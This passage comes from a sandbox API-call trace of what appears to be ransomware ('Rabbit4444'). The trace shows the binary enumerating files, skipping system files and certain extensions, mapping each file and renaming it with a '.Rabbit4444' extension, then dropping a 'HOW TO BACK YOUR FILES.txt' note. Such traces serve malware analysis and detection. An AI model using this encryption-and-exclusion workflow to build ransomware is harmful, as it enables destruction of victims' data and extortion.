dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0046.746] QueryPerformanceFrequency (in: lpFrequency=0x11cbe60 | out: lpFrequency=0x11cbe60*=100000000) returned 1 [0046.746] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbe68 | out: lpPerformanceCount=0x11cbe68*=13805669744) returned 1 [0046.746] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x11cbec0 | out: lpFileSize=0x11cbec0*=16497) returned 1 [0046.746] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0046.746] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0046.746] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4380, lpName=0x0) returned 0x280 [0046.749] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4380) returned 0x70000 [0046.754] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11a210 [0046.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0046.755] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11a210 | out: hHeap=0xe0000) returned 1 [0046.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0046.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x119df0 [0046.755] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0046.755] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x119df0 | out: hHeap=0xe0000) returned 1 [0046.755] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0046.755] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbe70 | out: lpPerformanceCount=0x11cbe70*=13806571932) returned 1 [0046.755] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0046.755] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0046.755] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.755] CloseHandle (hObject=0x280) returned 1 [0046.755] CloseHandle (hObject=0x2a0) returned 1 [0046.757] wsprintfW (in: param_1=0x11cc170, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\i386\\hwcompat.txt.Rabbit4444") returned 58 [0046.757] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\i386\\hwcompat.txt" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwcompat.txt"), lpNewFileName="C:\\Windows10Upgrade\\resources\\i386\\hwcompat.txt.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwcompat.txt.rabbit4444"), dwFlags=0x1) returned 1 [0046.757] InterlockedExchangeAdd (in: Addend=0xff3e8, Value=16512 | out: Addend=0xff3e8) returned 91648 [0046.757] InterlockedExchangeAdd (in: Addend=0xff3f4, Value=9 | out: Addend=0xff3f4) returned 15 [0046.758] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x11cde90 | out: lpFindFileData=0x11cde90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3ada69, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3ada69, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x8d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwexclude.txt", cAlternateFileName="HWEXCL~1.TXT")) returned 1 [0046.758] lstrcmpiW (lpString1="hwexclude.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.758] lstrcmpiW (lpString1="hwexclude.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.758] lstrcmpiW (lpString1="hwexclude.txt", lpString2="Rabbit4444.exe") returned -1 [0046.758] lstrcmpiW (lpString1="hwexclude.txt", lpString2=".") returned 1 [0046.758] lstrcmpiW (lpString1="hwexclude.txt", lpString2="..") returned 1 [0046.758] lstrcmpiW (lpString1="hwexclude.txt", lpString2="windows") returned -1 [0046.758] lstrcmpiW (lpString1="hwexclude.txt", lpString2="bootmgr") returned 1 [0046.758] lstrcmpiW (lpString1="hwexclude.txt", lpString2="pagefile.sys") returned -1 [0046.758] lstrcmpiW (lpString1="hwexclude.txt", lpString2="boot") returned 1 [0046.758] lstrcmpiW (lpString1="hwexclude.txt", lpString2="ids.txt") returned -1 [0046.758] lstrcmpiW (lpString1="hwexclude.txt", lpString2="NTUSER.DAT") returned -1 [0046.758] lstrcpyW (in: lpString1=0x11cea26, lpString2="hwexclude.txt" | out: lpString1="hwexclude.txt") returned="hwexclude.txt" [0046.758] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\hwexclude.txt", dwFileAttributes=0x0) returned 1 [0046.758] lstrlenW (lpString="hwexclude.txt") returned 13 [0046.758] lstrlenW (lpString="Rabbit4444") returned 10 [0046.758] lstrcmpiW (lpString1="xclude.txt", lpString2="Rabbit4444") returned 1 [0046.758] lstrlenW (lpString=".dll") returned 4 [0046.758] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0046.758] lstrlenW (lpString=".lnk") returned 4 [0046.758] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0046.758] lstrlenW (lpString=".ini") returned 4 [0046.758] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0046.758] lstrlenW (lpString=".sys") returned 4 [0046.758] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0046.759] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\hwexclude.txt" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwexclude.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0046.759] QueryPerformanceFrequency (in: lpFrequency=0x11cbe60 | out: lpFrequency=0x11cbe60*=100000000) returned 1 [0046.759] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbe68 | out: lpPerformanceCount=0x11cbe68*=13806942698) returned 1 [0046.759] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x11cbec0 | out: lpFileSize=0x11cbec0*=2263) returned 1 [0046.759] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0046.759] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0046.759] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbe0, lpName=0x0) returned 0x280 [0046.760] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbe0) returned 0x70000 [0046.762] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11a210 [0046.762] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0046.762] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11a210 | out: hHeap=0xe0000) returned 1 [0046.762] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0046.762] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x119df0 [0046.762] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0046.762] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x119df0 | out: hHeap=0xe0000) returned 1 [0046.762] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0046.762] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbe70 | out: lpPerformanceCount=0x11cbe70*=13807294782) returned 1 [0046.762] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0046.762] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0046.762] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.762] CloseHandle (hObject=0x280) returned 1 [0046.762] CloseHandle (hObject=0x2a0) returned 1 [0046.764] wsprintfW (in: param_1=0x11cc170, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\i386\\hwexclude.txt.Rabbit4444") returned 59 [0046.764] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\i386\\hwexclude.txt" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwexclude.txt"), lpNewFileName="C:\\Windows10Upgrade\\resources\\i386\\hwexclude.txt.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwexclude.txt.rabbit4444"), dwFlags=0x1) returned 1 [0046.764] InterlockedExchangeAdd (in: Addend=0xff3e8, Value=2272 | out: Addend=0xff3e8) returned 108160 [0046.764] InterlockedExchangeAdd (in: Addend=0xff3f4, Value=3 | out: Addend=0xff3f4) returned 24 [0046.764] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x11cde90 | out: lpFindFileData=0x11cde90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3aedef, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3aedef, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x2684, dwReserved0=0x0, dwReserved1=0x0, cFileName="nxquery.cat", cAlternateFileName="")) returned 1 [0046.764] lstrcmpiW (lpString1="nxquery.cat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.764] lstrcmpiW (lpString1="nxquery.cat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.764] lstrcmpiW (lpString1="nxquery.cat", lpString2="Rabbit4444.exe") returned -1 [0046.764] lstrcmpiW (lpString1="nxquery.cat", lpString2=".") returned 1 [0046.764] lstrcmpiW (lpString1="nxquery.cat", lpString2="..") returned 1 [0046.764] lstrcmpiW (lpString1="nxquery.cat", lpString2="windows") returned -1 [0046.765] lstrcmpiW (lpString1="nxquery.cat", lpString2="bootmgr") returned 1 [0046.765] lstrcmpiW (lpString1="nxquery.cat", lpString2="pagefile.sys") returned -1 [0046.765] lstrcmpiW (lpString1="nxquery.cat", lpString2="boot") returned 1 [0046.765] lstrcmpiW (lpString1="nxquery.cat", lpString2="ids.txt") returned 1 [0046.765] lstrcmpiW (lpString1="nxquery.cat", lpString2="NTUSER.DAT") returned 1 [0046.765] lstrcpyW (in: lpString1=0x11cea26, lpString2="nxquery.cat" | out: lpString1="nxquery.cat") returned="nxquery.cat" [0046.765] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\nxquery.cat", dwFileAttributes=0x0) returned 1 [0046.765] lstrlenW (lpString="nxquery.cat") returned 11 [0046.765] lstrlenW (lpString="Rabbit4444") returned 10 [0046.765] lstrcmpiW (lpString1="xquery.cat", lpString2="Rabbit4444") returned 1 [0046.765] lstrlenW (lpString=".dll") returned 4 [0046.765] lstrcmpiW (lpString1=".cat", lpString2=".dll") returned -1 [0046.765] lstrlenW (lpString=".lnk") returned 4 [0046.765] lstrcmpiW (lpString1=".cat", lpString2=".lnk") returned -1 [0046.765] lstrlenW (lpString=".ini") returned 4 [0046.765] lstrcmpiW (lpString1=".cat", lpString2=".ini") returned -1 [0046.765] lstrlenW (lpString=".sys") returned 4 [0046.765] lstrcmpiW (lpString1=".cat", lpString2=".sys") returned -1 [0046.765] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\nxquery.cat" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.cat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0046.765] QueryPerformanceFrequency (in: lpFrequency=0x11cbe60 | out: lpFrequency=0x11cbe60*=100000000) returned 1 [0046.765] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbe68 | out: lpPerformanceCount=0x11cbe68*=13807627017) returned 1 [0046.766] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x11cbec0 | out: lpFileSize=0x11cbec0*=9860) returned 1 [0046.766] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0046.766] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0046.766] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2990, lpName=0x0) returned 0x280 [0046.767] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2990) returned 0x70000 [0046.768] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11a210 [0046.768] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0046.768] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11a210 | out: hHeap=0xe0000) returned 1 [0046.769] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0046.769] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x119df0 [0046.769] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0046.769] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x119df0 | out: hHeap=0xe0000) returned 1 [0046.769] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0046.769] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbe70 | out: lpPerformanceCount=0x11cbe70*=13807966839) returned 1 [0046.769] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0046.769] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0046.769] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.769] CloseHandle (hObject=0x280) returned 1 [0046.769] CloseHandle (hObject=0x2a0) returned 1 [0046.771] wsprintfW (in: param_1=0x11cc170, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\i386\\nxquery.cat.Rabbit4444") returned 57 [0046.771] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\i386\\nxquery.cat" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.cat"), lpNewFileName="C:\\Windows10Upgrade\\resources\\i386\\nxquery.cat.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.cat.rabbit4444"), dwFlags=0x1) returned 1 [0046.771] InterlockedExchangeAdd (in: Addend=0xff3e8, Value=9872 | out: Addend=0xff3e8) returned 110432 [0046.771] InterlockedExchangeAdd (in: Addend=0xff3f4, Value=3 | out: Addend=0xff3f4) returned 27 [0046.771] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x11cde90 | out: lpFindFileData=0x11cde90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3b017f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b017f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x5d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nxquery.inf", cAlternateFileName="")) returned 1 [0046.771] lstrcmpiW (lpString1="nxquery.inf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.771] lstrcmpiW (lpString1="nxquery.inf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.771] lstrcmpiW (lpString1="nxquery.inf", lpString2="Rabbit4444.exe") returned -1 [0046.771] lstrcmpiW (lpString1="nxquery.inf", lpString2=".") returned 1 [0046.771] lstrcmpiW (lpString1="nxquery.inf", lpString2="..") returned 1 [0046.771] lstrcmpiW (lpString1="nxquery.inf", lpString2="windows") returned -1 [0046.771] lstrcmpiW (lpString1="nxquery.inf", lpString2="bootmgr") returned 1 [0046.771] lstrcmpiW (lpString1="nxquery.inf", lpString2="pagefile.sys") returned -1 [0046.771] lstrcmpiW (lpString1="nxquery.inf", lpString2="boot") returned 1 [0046.772] lstrcmpiW (lpString1="nxquery.inf", lpString2="ids.txt") returned 1 [0046.772] lstrcmpiW (lpString1="nxquery.inf", lpString2="NTUSER.DAT") returned 1 [0046.772] lstrcpyW (in: lpString1=0x11cea26, lpString2="nxquery.inf" | out: lpString1="nxquery.inf") returned="nxquery.inf" [0046.772] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\nxquery.inf", dwFileAttributes=0x0) returned 1 [0046.772] lstrlenW (lpString="nxquery.inf") returned 11 [0046.772] lstrlenW (lpString="Rabbit4444") returned 10 [0046.772] lstrcmpiW (lpString1="xquery.inf", lpString2="Rabbit4444") returned 1 [0046.772] lstrlenW (lpString=".dll") returned 4 [0046.772] lstrcmpiW (lpString1=".inf", lpString2=".dll") returned 1 [0046.772] lstrlenW (lpString=".lnk") returned 4 [0046.772] lstrcmpiW (lpString1=".inf", lpString2=".lnk") returned -1 [0046.772] lstrlenW (lpString=".ini") returned 4 [0046.772] lstrcmpiW (lpString1=".inf", lpString2=".ini") returned -1 [0046.772] lstrlenW (lpString=".sys") returned 4 [0046.772] lstrcmpiW (lpString1=".inf", lpString2=".sys") returned -1 [0046.772] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\nxquery.inf" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.inf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0046.772] QueryPerformanceFrequency (in: lpFrequency=0x11cbe60 | out: lpFrequency=0x11cbe60*=100000000) returned 1 [0046.772] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbe68 | out: lpPerformanceCount=0x11cbe68*=13808312942) returned 1 [0046.772] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x11cbec0 | out: lpFileSize=0x11cbec0*=1495) returned 1 [0046.772] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0046.773] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0046.773] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8e0, lpName=0x0) returned 0x280 [0046.774] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8e0) returned 0x70000 [0046.775] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11a210 [0046.775] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0046.775] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11a210 | out: hHeap=0xe0000) returned 1 [0046.775] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0046.775] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x119df0 [0046.775] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0046.775] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x119df0 | out: hHeap=0xe0000) returned 1 [0046.775] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0046.775] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbe70 | out: lpPerformanceCount=0x11cbe70*=13808608943) returned 1 [0046.775] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0046.775] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0046.775] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.776] CloseHandle (hObject=0x280) returned 1 [0046.776] CloseHandle (hObject=0x2a0) returned 1 [0046.777] wsprintfW (in: param_1=0x11cc170, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\i386\\nxquery.inf.Rabbit4444") returned 57 [0046.777] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\i386\\nxquery.inf" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.inf"), lpNewFileName="C:\\Windows10Upgrade\\resources\\i386\\nxquery.inf.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.inf.rabbit4444"), dwFlags=0x1) returned 1 [0046.778] InterlockedExchangeAdd (in: Addend=0xff3e8, Value=1504 | out: Addend=0xff3e8) returned 120304 [0046.778] InterlockedExchangeAdd (in: Addend=0xff3f4, Value=2 | out: Addend=0xff3f4) returned 30 [0046.778] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x11cde90 | out: lpFindFileData=0x11cde90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3b2895, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b2895, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x4eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NXQuery.sys", cAlternateFileName="")) returned 1 [0046.778] lstrcmpiW (lpString1="NXQuery.sys", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.778] lstrcmpiW (lpString1="NXQuery.sys", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.778] lstrcmpiW (lpString1="NXQuery.sys", lpString2="Rabbit4444.exe") returned -1 [0046.778] lstrcmpiW (lpString1="NXQuery.sys", lpString2=".") returned 1 [0046.778] lstrcmpiW (lpString1="NXQuery.sys", lpString2="..") returned 1 [0046.778] lstrcmpiW (lpString1="NXQuery.sys", lpString2="windows") returned -1 [0046.778] lstrcmpiW (lpString1="NXQuery.sys", lpString2="bootmgr") returned 1 [0046.778] lstrcmpiW (lpString1="NXQuery.sys", lpString2="pagefile.sys") returned -1 [0046.778] lstrcmpiW (lpString1="NXQuery.sys", lpString2="boot") returned 1 [0046.778] lstrcmpiW (lpString1="NXQuery.sys", lpString2="ids.txt") returned 1 [0046.778] lstrcmpiW (lpString1="NXQuery.sys", lpString2="NTUSER.DAT") returned 1 [0046.778] lstrcpyW (in: lpString1=0x11cea26, lpString2="NXQuery.sys" | out: lpString1="NXQuery.sys") returned="NXQuery.sys" [0046.778] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\NXQuery.sys", dwFileAttributes=0x0) returned 1 [0046.779] lstrlenW (lpString="NXQuery.sys") returned 11 [0046.779] lstrlenW (lpString="Rabbit4444") returned 10 [0046.779] lstrcmpiW (lpString1="XQuery.sys", lpString2="Rabbit4444") returned 1 [0046.779] lstrlenW (lpString=".dll") returned 4 [0046.779] lstrcmpiW (lpString1=".sys", lpString2=".dll") returned 1 [0046.779] lstrlenW (lpString=".lnk") returned 4 [0046.779] lstrcmpiW (lpString1=".sys", lpString2=".lnk") returned 1 [0046.779] lstrlenW (lpString=".ini") returned 4 [0046.779] lstrcmpiW (lpString1=".sys", lpString2=".ini") returned 1 [0046.779] lstrlenW (lpString=".sys") returned 4 [0046.779] lstrcmpiW (lpString1=".sys", lpString2=".sys") returned 0 [0046.779] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x11cde90 | out: lpFindFileData=0x11cde90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3b2895, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b2895, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x4eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NXQuery.sys", cAlternateFileName="")) returned 0 [0046.779] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0046.779] lstrcpyW (in: lpString1=0x11cea26, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.779] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\resources\\i386\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x29c [0046.779] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0046.780] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0046.780] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.780] CloseHandle (hObject=0x2a0) returned 1 [0046.780] CloseHandle (hObject=0x29c) returned 1 [0046.781] GetCurrentThreadId () returned 0x200 [0046.781] RtlInterlockedPopEntrySList (in: ListHead=0xf63f0 | out: ListHead=0xf63f0) returned 0x0 [0046.781] GetCurrentThreadId () returned 0x200 [0046.781] WaitForMultipleObjects (nCount=0x0, lpHandles=0x11ce0e0*=0x0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0xffffffff [0046.781] RtlInterlockedPopEntrySList (in: ListHead=0xf63f0 | out: ListHead=0xf63f0) returned 0x0 [0046.781] RtlInterlockedFlushSList (in: ListHead=0xf63f0 | out: ListHead=0xf63f0) returned 0x0 [0046.781] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63e8 | out: hHeap=0xe0000) returned 1 [0046.781] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xff3d8 | out: hHeap=0xe0000) returned 1 [0046.781] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ccf0 | out: hHeap=0xe0000) returned 1 [0046.781] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11a000 | out: hHeap=0xe0000) returned 1 [0046.781] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105510 | out: hHeap=0xe0000) returned 1 [0046.781] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 Thread: id = 16 os_tid = 0xcc8 [0060.001] RtlInterlockedPopEntrySList (in: ListHead=0x122128 | out: ListHead=0x122128) returned 0x122268 [0060.001] lstrcpynW (in: lpString1=0x11ceb60, lpString2="C:\\Users\\Default", iMaxLength=2048 | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0060.001] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c480 | out: hHeap=0xe0000) returned 1 [0060.001] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0060.001] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0060.001] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0060.001] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\.BFC0E91B00AE8A0620D3" [0060.001] CreateFileW (lpFileName="C:\\Users\\Default\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 